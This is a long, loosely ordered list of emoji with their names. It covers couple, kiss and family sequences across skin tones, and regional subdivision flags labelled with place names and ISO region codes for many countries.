👩🏼❤️👩🏾 Couple With Heart - Woman: Medium-Light Skin Tone, Woman: Medium-Dark Skin Tone
👨🏿❤️👩🏾 Couple With Heart - Man: Dark Skin Tone, Woman: Medium-Dark Skin Tone
🏴 Flag for Sergipe (BR-SE)
🏴 Flag for Paraná (BR-PR)
👨🏿👦🏿 Family - Man: Dark Skin Tone, Boy: Dark Skin Tone
👩🏼❤️👩🏽 Couple With Heart - Woman: Medium-Light Skin Tone, Woman: Medium Skin Tone
👩🏾❤️👩🏼 Couple With Heart - Woman: Medium-Dark Skin Tone, Woman: Medium-Light Skin Tone
🏴 Flag for Moscow Province (RU-MOS)
👩🏽❤️💋👩🏽 Kiss - Woman: Medium Skin Tone, Woman: Medium Skin Tone
👩🏿👦🏿👦🏿 Family - Woman: Dark Skin Tone, Boy: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for São Paulo (BR-SP)
🏴 Flag for East Azerbaijan (IR-01)
🏴 Flag for Rio Grande do Sul (BR-RS)
👩🏼❤️👨🏿 Couple With Heart - Woman: Medium-Light Skin Tone, Man: Dark Skin Tone
🏴 Flag for Sogn og Fjordane (NO-14)
🏴 Flag for Tocantins (BR-TO)
🏴 Flag for Sveti Andraž v Slovenskih Goricah (SI-182)
👨🏼❤️👩🏻 Couple With Heart - Man: Medium-Light Skin Tone, Woman: Light Skin Tone
👨🏿❤️👨🏽 Couple With Heart - Man: Dark Skin Tone, Man: Medium Skin Tone
👨🏽👦🏽👦🏽 Family - Man: Medium Skin Tone, Boy: Medium Skin Tone, Boy: Medium Skin Tone
👨🏿👦🏿👦🏿 Family - Man: Dark Skin Tone, Boy: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Bimini (BS-BI)
👨🏿❤️👩 Couple With Heart - Man: Dark Skin Tone, Woman
👩🏻👦🏻👦🏻 Family - Woman: Light Skin Tone, Boy: Light Skin Tone, Boy: Light Skin Tone
🏴 Flag for Roraima (BR-RR)
🏴 Flag for Oruro (BO-O)
🏴 Flag for Exuma (BS-EX)
👨🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
👩🏽❤️👨 Couple With Heart - Woman: Medium Skin Tone, Man
🏴 Flag for Central Eleuthera (BS-CE)
🏴 Flag for Berry Islands (BS-BY)
🏴 Flag for Makamba (BI-MA)
🏴 Flag for Federal District (BR-DF)
👩🏻❤️👩🏾 Couple With Heart - Woman: Light Skin Tone, Woman: Medium-Dark Skin Tone
👨🏼❤️💋👩🏼 Kiss - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone
🏴 Flag for Central Abaco (BS-CO)
🏴 Flag for East Grand Bahama (BS-EG)
🏴 Flag for Central Andros (BS-CS)
👨🏻👦🏻👧🏻 Family - Man: Light Skin Tone, Boy: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Crooked Island (BS-CK)
🏴 Flag for Black Point (BS-BP)
👨🏼👦🏼👧🏼 Family - Man: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👨🏽👦🏽👧🏽 Family - Man: Medium Skin Tone, Boy: Medium Skin Tone, Girl: Medium Skin Tone
👩🏿❤️👨🏾 Couple With Heart - Woman: Dark Skin Tone, Man: Medium-Dark Skin Tone
👩🏾❤️💋👨🏼 Kiss - Woman: Medium-Dark Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for North Eleuthera (BS-NE)
🏴 Flag for North Abaco (BS-NO)
🏴 Flag for Mayaguana (BS-MG)
👨🏾👦🏾👧🏾 Family - Man: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👨🏼❤️💋👩🏻 Kiss - Man: Medium-Light Skin Tone, Woman: Light Skin Tone
🏴 Flag for Grand Cay (BS-GC)
🏴 Flag for Freeport (BS-FP)
🏴 Flag for Inagua (BS-IN)
🏴 Flag for Hope Town (BS-HT)
👩🏾❤️👩🏿 Couple With Heart - Woman: Medium-Dark Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Long Island (BS-LI)
👨🏿👦🏿👧🏿 Family - Man: Dark Skin Tone, Boy: Dark Skin Tone, Girl: Dark Skin Tone
👨🏾❤️👩 Couple With Heart - Man: Medium-Dark Skin Tone, Woman
👩🏿❤️👨🏿 Couple With Heart - Woman: Dark Skin Tone, Man: Dark Skin Tone
👨🏻👦🏻👶🏻 Family - Man: Light Skin Tone, Boy: Light Skin Tone, Baby: Light Skin Tone
👨👨👶 Family: Man, Man, Baby
👩👧👶 Family: Woman, Girl, Baby
👨👦👶 Family: Man, Boy, Baby
👨👨👶👦 Family: Man, Man, Baby, Boy
👨👦👧 Family: Man, Boy, Girl
👨👶👶 Family: Man, Baby, Baby
🏴 Flag for Ragged Island (BS-RI)
👩🏿❤️👩🏿 Couple With Heart - Woman: Dark Skin Tone, Woman: Dark Skin Tone
👩🏿❤️👨🏽 Couple With Heart - Woman: Dark Skin Tone, Man: Medium Skin Tone
👩🏼❤️👨🏼 Couple With Heart - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for North Andros (BS-NS)
👩🏿❤️👩🏻 Couple With Heart - Woman: Dark Skin Tone, Woman: Light Skin Tone
👨🏻❤️💋👨 Kiss - Man: Light Skin Tone, Man
🏴 Flag for South Andros (BS-SA)
👨🏻❤️💋👨🏼 Kiss - Man: Light Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for South Eleuthera (BS-SE)
👨🏼👦🏼👶🏼 Family - Man: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👨🏻❤️💋👩🏻 Kiss - Man: Light Skin Tone, Woman: Light Skin Tone
👨🏼❤️💋👩🏾 Kiss - Man: Medium-Light Skin Tone, Woman: Medium-Dark Skin Tone
👨🏾❤️💋👩🏼 Kiss - Man: Medium-Dark Skin Tone, Woman: Medium-Light Skin Tone
👨🏾❤️💋👨🏻 Kiss - Man: Medium-Dark Skin Tone, Man: Light Skin Tone
🏴 Flag for Santa Catarina (BR-SC)
👩👩👦👧 Family: Woman, Woman, Boy, Girl
👨❤️💋👩🏾 Kiss - Man, Woman: Medium-Dark Skin Tone
🏴 Flag for Rum Cay (BS-RC)
👩👩👶👦 Family: Woman, Woman, Baby, Boy
👨🏻❤️💋👩🏽 Kiss - Man: Light Skin Tone, Woman: Medium Skin Tone
🏴 Flag for Cat Island (BS-CI)
👩🏽❤️👩 Couple With Heart - Woman: Medium Skin Tone, Woman
👨🏽👦🏽👶🏽 Family - Man: Medium Skin Tone, Boy: Medium Skin Tone, Baby: Medium Skin Tone
👩👨👦👶 Family: Woman, Man, Boy, Baby
👨🏾❤️💋👩 Kiss - Man: Medium-Dark Skin Tone, Woman
👨❤️💋👨🏻 Kiss - Man, Man: Light Skin Tone
👨🏻❤️💋👨🏿 Kiss - Man: Light Skin Tone, Man: Dark Skin Tone
👨🏼❤️💋👩🏽 Kiss - Man: Medium-Light Skin Tone, Woman: Medium Skin Tone
👨🏾👦🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for South Abaco (BS-SO)
👩🏾❤️💋👩🏼 Kiss - Woman: Medium-Dark Skin Tone, Woman: Medium-Light Skin Tone
👨🏻❤️👨🏿 Couple With Heart - Man: Light Skin Tone, Man: Dark Skin Tone
👨🏿❤️💋👨🏿 Kiss - Man: Dark Skin Tone, Man: Dark Skin Tone
👩🏾❤️💋👨🏿 Kiss - Woman: Medium-Dark Skin Tone, Man: Dark Skin Tone
👩🏼❤️💋👨🏽 Kiss - Woman: Medium-Light Skin Tone, Man: Medium Skin Tone
👩🏾❤️💋👨🏻 Kiss - Woman: Medium-Dark Skin Tone, Man: Light Skin Tone
👩🏽❤️💋👨 Kiss - Woman: Medium Skin Tone, Man
👨👧👶 Family: Man, Girl, Baby
👩🏻❤️💋👨🏾 Kiss - Woman: Light Skin Tone, Man: Medium-Dark Skin Tone
👨❤️👨🏼 Couple With Heart - Man, Man: Medium-Light Skin Tone
👩🏼❤️💋👩🏼 Kiss - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone
👨🏿❤️💋👩🏿 Kiss - Man: Dark Skin Tone, Woman: Dark Skin Tone
👨❤️💋👩🏼 Kiss - Man, Woman: Medium-Light Skin Tone
🏴 Flag for Abidjan (CI-AB)
👩🏻❤️💋👨 Kiss - Woman: Light Skin Tone, Man
👩🏼❤️💋👩🏾 Kiss - Woman: Medium-Light Skin Tone, Woman: Medium-Dark Skin Tone
👨🏻❤️💋👩🏼 Kiss - Man: Light Skin Tone, Woman: Medium-Light Skin Tone
👩🏽❤️💋👨🏿 Kiss - Woman: Medium Skin Tone, Man: Dark Skin Tone
👩🏿❤️💋👩🏼 Kiss - Woman: Dark Skin Tone, Woman: Medium-Light Skin Tone
👩🏿❤️💋👨🏾 Kiss - Woman: Dark Skin Tone, Man: Medium-Dark Skin Tone
👩🏼❤️💋👨 Kiss - Woman: Medium-Light Skin Tone, Man
👩❤️👩🏾 Couple With Heart - Woman, Woman: Medium-Dark Skin Tone
👨🏿❤️👨🏼 Couple With Heart - Man: Dark Skin Tone, Man: Medium-Light Skin Tone
👨🏿👦🏿👶🏿 Family - Man: Dark Skin Tone, Boy: Dark Skin Tone, Baby: Dark Skin Tone
👨🏼❤️👩🏼 Couple With Heart - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone
👩🏼❤️👨🏽 Couple With Heart - Woman: Medium-Light Skin Tone, Man: Medium Skin Tone
🏴 Flag for Spanish Wells (BS-SW)
👨🏿❤️👨🏿 Couple With Heart - Man: Dark Skin Tone, Man: Dark Skin Tone
👨🏼❤️👨🏿 Couple With Heart - Man: Medium-Light Skin Tone, Man: Dark Skin Tone
👨🏼❤️👩 Couple With Heart - Man: Medium-Light Skin Tone, Woman
👩🏼❤️👩🏼 Couple With Heart - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone
👨🏼❤️👨🏻 Couple With Heart - Man: Medium-Light Skin Tone, Man: Light Skin Tone
👨🏾❤️👨🏾 Couple With Heart - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone
👩❤️👩🏼 Couple With Heart - Woman, Woman: Medium-Light Skin Tone
👨🏼❤️👩🏿 Couple With Heart - Man: Medium-Light Skin Tone, Woman: Dark Skin Tone
👨🏻❤️👨🏾 Couple With Heart - Man: Light Skin Tone, Man: Medium-Dark Skin Tone
👨🏽❤️👩🏾 Couple With Heart - Man: Medium Skin Tone, Woman: Medium-Dark Skin Tone
👩❤️👩🏿 Couple With Heart - Woman, Woman: Dark Skin Tone
👨🏽❤️👨🏿 Couple With Heart - Man: Medium Skin Tone, Man: Dark Skin Tone
👨👨👦👶 Family: Man, Man, Boy, Baby
👨🏿❤️👨 Couple With Heart - Man: Dark Skin Tone, Man
👩🏻❤️👩🏿 Couple With Heart - Woman: Light Skin Tone, Woman: Dark Skin Tone
🏴 Flag for San Salvador (BS-SS)
🏴 Flag for Samtse (BT-14)
👩🏻❤️👨🏽 Couple With Heart - Woman: Light Skin Tone, Man: Medium Skin Tone
👩🏼❤️👩🏿 Couple With Heart - Woman: Medium-Light Skin Tone, Woman: Dark Skin Tone
👨❤️👩🏿 Couple With Heart - Man, Woman: Dark Skin Tone
🏴 Flag for Paro (BT-11)
👨🏻❤️👩🏾 Couple With Heart - Man: Light Skin Tone, Woman: Medium-Dark Skin Tone
👨🏼👧🏼 Family - Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
🏴 Flag for Thimphu (BT-15)
👩🏾❤️👩🏽 Couple With Heart - Woman: Medium-Dark Skin Tone, Woman: Medium Skin Tone
🏴 Flag for West Grand Bahama (BS-WG)
🏴 Flag for Haa (BT-13)
🏴 Flag for Chukha (BT-12)
👨🏻❤️💋👨🏽 Kiss - Man: Light Skin Tone, Man: Medium Skin Tone
👨🏾👧🏾 Family - Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👨🏽👧🏽 Family - Man: Medium Skin Tone, Girl: Medium Skin Tone
🏴 Flag for Acklins (BS-AK)
🏴 Flag for Trongsa (BT-32)
🏴 Flag for Trashigang (BT-41)
🏴 Flag for Punakha (BT-23)
🏴 Flag for Wangdue Phodrang (BT-24)
🏴 Flag for Bumthang (BT-33)
🏴 Flag for Zhemgang (BT-34)
👩🏼❤️💋👨🏼 Kiss - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for Mongar (BT-42)
🏴 Flag for Paraíba (BR-PB)
👩🏿❤️👨🏼 Couple With Heart - Woman: Dark Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for Zürich (CH-ZH)
🏴 Flag for Sarpang (BT-31)
🏴 Flag for Dagana (BT-22)
👩🏻❤️💋👨🏽 Kiss - Woman: Light Skin Tone, Man: Medium Skin Tone
👨🏿👨🏿👧🏿👧🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Girl: Dark Skin Tone, Girl: Dark Skin Tone
🏴 Flag for Central (BW-CE)
🏴 Flag for Gasa (BT-GA)
🏴 Flag for Chobe (BW-CH)
🏴 Flag for Samdrup Jongkhar (BT-45)
🏴 Flag for Francistown (BW-FR)
🏴 Flag for Lhuntse (BT-44)
🏴 Flag for Trashiyangtse (BT-TY)
🏴 Flag for Tsirang (BT-21)
🏴 Flag for Pemagatshel (BT-43)
👨🏿👧🏿 Family - Man: Dark Skin Tone, Girl: Dark Skin Tone
🏴 Flag for North East (BW-NE)
🏴 Flag for Kgatleng (BW-KL)
🏴 Flag for Kgalagadi (BW-KG)
🏴 Flag for South East (BW-SE)
🏴 Flag for Kweneng (BW-KW)
👨🏻👧🏻👦🏻 Family - Man: Light Skin Tone, Girl: Light Skin Tone, Boy: Light Skin Tone
🏴 Flag for North West (BW-NW)
🏴 Flag for Jwaneng (BW-JW)
🏴 Flag for Mangrove Cay (BS-MC)
👩🏼❤️💋👩🏿 Kiss - Woman: Medium-Light Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Ghanzi (BW-GH)
👨🏻❤️👩🏻 Couple With Heart - Man: Light Skin Tone, Woman: Light Skin Tone
🏴 Flag for Atlantique (BJ-AQ)
👨🏼👧🏼👦🏼 Family - Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
👨🏾👧🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
👨🏿👧🏿👦🏿 Family - Man: Dark Skin Tone, Girl: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Southern (BW-SO)
👨🏽👧🏽👦🏽 Family - Man: Medium Skin Tone, Girl: Medium Skin Tone, Boy: Medium Skin Tone
👩🏾❤️👩 Couple With Heart - Woman: Medium-Dark Skin Tone, Woman
👨👩👶👧 Family: Man, Woman, Baby, Girl
👨🏽❤️💋👨🏾 Kiss - Man: Medium Skin Tone, Man: Medium-Dark Skin Tone
🏴 Flag for Sowa Town (BW-ST)
🏴 Flag for Selibe Phikwe (BW-SP)
👩🏿❤️👩🏾 Couple With Heart - Woman: Dark Skin Tone, Woman: Medium-Dark Skin Tone
👩👨👦👦 Family: Woman, Man, Boy, Boy
👩🏿👨🏿👦🏿👶🏿 Family - Woman: Dark Skin Tone, Man: Dark Skin Tone, Boy: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Minsk (BY-HM)
🏴 Flag for Homel (BY-HO)
👨🏻👦🏻👦🏻 Family - Man: Light Skin Tone, Boy: Light Skin Tone, Boy: Light Skin Tone
👨🏻👩🏻👧🏻👦🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Girl: Light Skin Tone, Boy: Light Skin Tone
🏴 Flag for Izmir (TR-35)
🏴 Flag for Hrodna (BY-HR)
🏴 Flag for Magileu (BY-MA)
🏴 Flag for Minsk Region (BY-MI)
👨🏼❤️💋👩🏿 Kiss - Man: Medium-Light Skin Tone, Woman: Dark Skin Tone
👨🏾❤️👩🏻 Couple With Heart - Man: Medium-Dark Skin Tone, Woman: Light Skin Tone
🏴 Flag for Belize (BZ-BZ)
🏴 Flag for Lobatse (BW-LO)
👩👦👧 Family: Woman, Boy, Girl
👨🏼👧🏼👧🏼 Family - Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
🏴 Flag for Moore’s Island (BS-MI)
🏴 Flag for Mono (BJ-MO)
👨🏽👧🏽👧🏽 Family - Man: Medium Skin Tone, Girl: Medium Skin Tone, Girl: Medium Skin Tone
🏴 Flag for Vitebsk (BY-VI)
🏴 Flag for Stann Creek (BZ-SC)
👨🏾👧🏾👧🏾 Family - Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
🏴 Flag for Corozal (BZ-CZL)
👨🏻👧🏻👶🏻 Family - Man: Light Skin Tone, Girl: Light Skin Tone, Baby: Light Skin Tone
👨🏿👧🏿👧🏿 Family - Man: Dark Skin Tone, Girl: Dark Skin Tone, Girl: Dark Skin Tone
🏴 Flag for Toledo (BZ-TOL)
🏴 Flag for Sudur Pashchimanchal (NP-5)
🏴 Flag for Harbour Island (BS-HI)
🏴 Flag for Alberta (CA-AB)
👩🏾❤️👨🏾 Couple With Heart - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone
👨🏽❤️💋👨🏼 Kiss - Man: Medium Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for Vientiane Province (LA-VI)
👨👩👦👧 Family: Man, Woman, Boy, Girl
👨🏻👧🏻👧🏻 Family - Man: Light Skin Tone, Girl: Light Skin Tone, Girl: Light Skin Tone
👨🏼👧🏼👶🏼 Family - Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👨🏽👧🏽👶🏽 Family - Man: Medium Skin Tone, Girl: Medium Skin Tone, Baby: Medium Skin Tone
🏴 Flag for Prince Edward Island (CA-PE)
🏴 Flag for Kwango (CD-KG)
🏴 Flag for Nova Scotia (CA-NS)
👨🏾👧🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for Haut-Uélé (CD-HU)
🏴 Flag for Bas-Congo (CD-BC)
🏴 Flag for Sud-Ubangi (CD-SU)
🏴 Flag for Maniema (CD-MA)
🏴 Flag for Sankuru (CD-SA)
🏴 Flag for Tshuapa (CD-TU)
🏴 Flag for Yukon (CA-YT)
🏴 Flag for Mongala (CD-MO)
🏴 Flag for Bamingui-Bangoran (CF-BB)
🏴 Flag for Mai-Ndombe (CD-MN)
🏴 Flag for Nunavut (CA-NU)
🏴 Flag for Kwilu (CD-KL)
🏴 Flag for New Brunswick (CA-NB)
🏴 Flag for Bangui (CF-BGF)
🏴 Flag for Kinshasa (CD-KN)
🏴 Flag for North Kivu (CD-NK)
🏴 Flag for Northwest Territories (CA-NT)
🏴 Flag for Tshopo (CD-TO)
🏴 Flag for Bas-Uélé (CD-BU)
🏴 Flag for Haut-Lomami (CD-HL)
🏴 Flag for Haut-Katanga (CD-HK)
🏴 Flag for Kasaï-Oriental (CD-KE)
🏴 Flag for South Kivu (CD-SK)
🏴 Flag for Ontario (CA-ON)
🏴 Flag for Ouham (CF-AC)
🏴 Flag for Mambéré-Kadéï (CF-HS)
🏴 Flag for Kasaï Central (CD-KC)
🏴 Flag for Nord-Ubangi (CD-NU)
🏴 Flag for Kasaï (CD-KS)
🏴 Flag for Ituri (CD-IT)
🏴 Flag for Bern (CH-BE)
🏴 Flag for Lékoumou (CG-2)
🏴 Flag for Appenzell Innerrhoden (CH-AI)
🏴 Flag for Ombella-M’Poko (CF-MP)
👨🏻👶🏻 Family - Man: Light Skin Tone, Baby: Light Skin Tone
🏴 Flag for Kémo (CF-KG)
🏴 Flag for Sangha (CG-13)
🏴 Flag for Lucerne (CH-LU)
🏴 Flag for Geneva (CH-GE)
🏴 Flag for Nidwalden (CH-NW)
🏴 Flag for Kouilou (CG-5)
🏴 Flag for Likouala (CG-7)
🏴 Flag for Brazzaville (CG-BZV)
🏴 Flag for Schaffhausen (CH-SH)
🏴 Flag for Lomami (CD-LO)
🏴 Flag for Appenzell Ausserrhoden (CH-AR)
🏴 Flag for Schwyz (CH-SZ)
🏴 Flag for Neuchâtel (CH-NE)
🏴 Flag for Ouham-Pendé (CF-OP)
🏴 Flag for Graubünden (CH-GR)
🏴 Flag for Solothurn (CH-SO)
🏴 Flag for Fribourg (CH-FR)
🏴 Flag for Plateaux (CG-14)
🏴 Flag for Sangha-Mbaéré (CF-SE)
👨🏿👧🏿👶🏿 Family - Man: Dark Skin Tone, Girl: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Aargau (CH-AG)
🏴 Flag for Cuvette-Ouest (CG-15)
🏴 Flag for St. Gallen (CH-SG)
🏴 Flag for Cuvette (CG-8)
🏴 Flag for Obwalden (CH-OW)
🏴 Flag for Basel-Stadt (CH-BS)
🏴 Flag for Lobaye (CF-LB)
🏴 Flag for Valparaíso (CL-VS)
🏴 Flag for Northwest (CM-NW)
🏴 Flag for Denguélé (CI-DN)
🏴 Flag for North (CM-NO)
🏴 Flag for Yamoussoukro (CI-YM)
🏴 Flag for East (CM-ES)
👨🏼👶🏼 Family - Man: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
🏴 Flag for Woroba (CI-WR)
🏴 Flag for Lagunes (CI-LG)
🏴 Flag for Gôh-Djiboua (CI-GD)
🏴 Flag for Comoé (CI-CM)
🏴 Flag for Southwest (CM-SW)
🏴 Flag for Bío Bío (CL-BI)
🏴 Flag for Aysén (CL-AI)
🏴 Flag for Santiago Metropolitan (CL-RM)
🏴 Flag for Tarapacá (CL-TA)
🏴 Flag for South (CM-SU)
🏴 Flag for Atacama (CL-AT)
🏴 Flag for Tianjin (CN-12)
🏴 Flag for Lacs (CI-LC)
🏴 Flag for Coquimbo (CL-CO)
🏴 Flag for Arica y Parinacota (CL-AP)
🏴 Flag for Littoral (CM-LT)
🏴 Flag for Centre (CM-CE)
🏴 Flag for Far North (CM-EN)
🏴 Flag for Magallanes Region (CL-MA)
🏴 Flag for Maule (CL-ML)
🏴 Flag for Montagnes (CI-MG)
🏴 Flag for Bas-Sassandra (CI-BS)
🏴 Flag for Adamawa (CM-AD)
🏴 Flag for Los Ríos (CL-LR)
🏴 Flag for West (CM-OU)
🏴 Flag for Savanes (CI-SV)
🏴 Flag for Los Lagos (CL-LL)
🏴 Flag for Shandong (CN-37)
🏴 Flag for Gansu (CN-62)
🏴 Flag for Shanghai (CN-31)
🏴 Flag for Jiangxi (CN-36)
🏴 Flag for Taiwan (CN-71)
🏴 Flag for Boyacá (CO-BOY)
🏴 Flag for Beijing (CN-11)
🏴 Flag for Ruse (BG-18)
🏴 Flag for Guangdong (CN-44)
🏴 Flag for Qinghai (CN-63)
🏴 Flag for Heilongjiang (CN-23)
🏴 Flag for Sichuan (CN-51)
🏴 Flag for Caldas (CO-CAL)
🏴 Flag for Bolívar (CO-BOL)
🏴 Flag for Yunnan (CN-53)
🏴 Flag for Atlántico (CO-ATL)
🏴 Flag for Hubei (CN-42)
🏴 Flag for Jilin (CN-22)
🏴 Flag for Caquetá (CO-CAQ)
🏴 Flag for Zhejiang (CN-33)
🏴 Flag for Hebei (CN-13)
🏴 Flag for Inner Mongolia (CN-15)
🏴 Flag for Hunan (CN-43)
🏴 Flag for Haute-Kotto (CF-HK)
🏴 Flag for Xinjiang (CN-65)
🏴 Flag for Chongqing (CN-50)
🏴 Flag for Guangxi (CN-45)
🏴 Flag for Tibet (CN-54)
🏴 Flag for Jiangsu (CN-32)
🏴 Flag for Arauca (CO-ARA)
🏴 Flag for Fujian (CN-35)
🏴 Flag for Henan (CN-41)
🏴 Flag for Hainan (CN-46)
🏴 Flag for Shanxi (CN-14)
🏴 Flag for Magdalena (CO-MAG)
🏴 Flag for Chocó (CO-CHO)
🏴 Flag for Guainía (CO-GUA)
🏴 Flag for Córdoba (CO-COR)
🏴 Flag for Putumayo (CO-PUT)
🏴 Flag for Santander (CO-SAN)
🏴 Flag for Villa Clara (CU-05)
🏴 Flag for Valle del Cauca (CO-VAC)
🏴 Flag for Quindío (CO-QUI)
🏴 Flag for Risaralda (CO-RIS)
🏴 Flag for Cundinamarca (CO-CUN)
👨🏽👶🏽 Family - Man: Medium Skin Tone, Baby: Medium Skin Tone
🏴 Flag for Alajuela (CR-A)
🏴 Flag for Puntarenas (CR-P)
🏴 Flag for Huila (CO-HUI)
🏴 Flag for Vaupés (CO-VAU)
🏴 Flag for Cauca (CO-CAU)
🏴 Flag for Sancti Spíritus (CU-07)
🏴 Flag for Limón (CR-L)
🏴 Flag for Norte de Santander (CO-NSA)
🏴 Flag for Matanzas (CU-04)
🏴 Flag for Guanacaste (CR-G)
🏴 Flag for Havana (CU-03)
👩🏾❤️💋👨 Kiss - Woman: Medium-Dark Skin Tone, Man
🏴 Flag for Ciego de Ávila (CU-08)
🏴 Flag for Tolima (CO-TOL)
🏴 Flag for Camagüey (CU-09)
🏴 Flag for Cienfuegos (CU-06)
🏴 Flag for Guaviare (CO-GUV)
🏴 Flag for Cayo (BZ-CY)
🏴 Flag for Southern Nations, Nationalities, and Peoples (ET-SN)
🏴 Flag for Pinar del Río (CU-01)
🏴 Flag for San José (CR-SJ)
🏴 Flag for Cartago (CR-C)
🏴 Flag for La Guajira (CO-LAG)
🏴 Flag for Limassol (CY-02)
🏴 Flag for Lower Saxony (DE-NI)
🏴 Flag for Orange Walk (BZ-OW)
🏴 Flag for Kraj Vysočina (CZ-63)
🏴 Flag for Liberecký kraj (CZ-51)
🏴 Flag for Las Tunas (CU-10)
🏴 Flag for Santiago de Cuba (CU-13)
👨🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for Nicosia (CY-01)
🏴 Flag for Středočeský kraj (CZ-20)
🏴 Flag for Vakaga (CF-VK)
🏴 Flag for Královéhradecký kraj (CZ-52)
🏴 Flag for Karlovarský kraj (CZ-41)
🏴 Flag for Artemisa (CU-15)
🏴 Flag for Famagusta (CY-04)
🏴 Flag for Bremen (DE-HB)
🏴 Flag for Hesse (DE-HE)
🏴 Flag for Holguín (CU-11)
👨🏿👶🏿 Family - Man: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Moravskoslezský kraj (CZ-80)
🏴 Flag for Jihočeský kraj (CZ-31)
🏴 Flag for Glarus (CH-GL)
🏴 Flag for Praha, Hlavní mešto (CZ-10)
🏴 Flag for Larnaca (CY-03)
🏴 Flag for Hamburg (DE-HH)
🏴 Flag for Mecklenburg-Vorpommern (DE-MV)
🏴 Flag for Barlavento Islands (CV-B)
🏴 Flag for Sotavento Islands (CV-S)
🏴 Flag for Mayabeque (CU-16)
🏴 Flag for Olomoucký kraj (CZ-71)
🏴 Flag for Guantánamo (CU-14)
🏴 Flag for Brandenburg (DE-BB)
🏴 Flag for Plzeňský kraj (CZ-32)
🏴 Flag for Ali Sabieh (DJ-AS)
🏴 Flag for Rhineland-Palatinate (DE-RP)
🏴 Flag for Saxony (DE-SN)
🏴 Flag for Zealand (DK-85)
🏴 Flag for Saxony-Anhalt (DE-ST)
🏴 Flag for Chlef (DZ-02)
🏴 Flag for Saint Luke (DM-07)
🏴 Flag for Arta (DJ-AR)
🏴 Flag for Capital Region (DK-84)
🏴 Flag for Saint Paul (DM-10)
🏴 Flag for Cibao Sur (DO-36)
🏴 Flag for Enriquillo (DO-38)
🏴 Flag for Saint Patrick (DM-09)
🏴 Flag for Cibao Noroeste (DO-34)
🏴 Flag for Cibao Nordeste (DO-33)
🏴 Flag for Saint John (DM-05)
🏴 Flag for Yuma (DO-42)
🏴 Flag for Obock (DJ-OB)
🏴 Flag for Thuringia (DE-TH)
🏴 Flag for Ozama (DO-40)
🏴 Flag for Saarland (DE-SL)
🏴 Flag for Saint George (DM-04)
🏴 Flag for Saint David (DM-03)
🏴 Flag for Saint Andrew (DM-02)
🏴 Flag for Dikhil (DJ-DI)
🏴 Flag for Saint Mark (DM-08)
🏴 Flag for Tadjourah (DJ-TA)
🏴 Flag for Saint Peter (DM-11)
🏴 Flag for Valdesia (DO-41)
🏴 Flag for Higüamo (DO-39)
🏴 Flag for Laghouat (DZ-03)
🏴 Flag for M’Sila (DZ-28)
🏴 Flag for Illizi (DZ-33)
👩🏿👨🏿👧🏿 Family - Woman: Dark Skin Tone, Man: Dark Skin Tone, Girl: Dark Skin Tone
🏴 Flag for Tizi Ouzou (DZ-15)
🏴 Flag for Tiaret (DZ-14)
🏴 Flag for Sétif (DZ-19)
🏴 Flag for Djelfa (DZ-17)
🏴 Flag for Constantine (DZ-25)
🏴 Flag for Guelma (DZ-24)
🏴 Flag for Tipasa (DZ-42)
🏴 Flag for Batna (DZ-05)
🏴 Flag for Tébessa (DZ-12)
🏴 Flag for Biskra (DZ-07)
🏴 Flag for Ouargla (DZ-30)
🏴 Flag for Sidi Bel Abbès (DZ-22)
🏴 Flag for Tamanghasset (DZ-11)
🏴 Flag for Médéa (DZ-26)
🏴 Flag for El Bayadh (DZ-32)
🏴 Flag for Khenchela (DZ-40)
🏴 Flag for Tissemsilt (DZ-38)
🏴 Flag for El Oued (DZ-39)
🏴 Flag for Souk Ahras (DZ-41)
🏴 Flag for Tlemcen (DZ-13)
🏴 Flag for Béjaïa (DZ-06)
🏴 Flag for Mila (DZ-43)
🏴 Flag for Saïda (DZ-20)
🏴 Flag for Oran (DZ-31)
🏴 Flag for Bouira (DZ-10)
🏴 Flag for Boumerdès (DZ-35)
🏴 Flag for El Tarf (DZ-36)
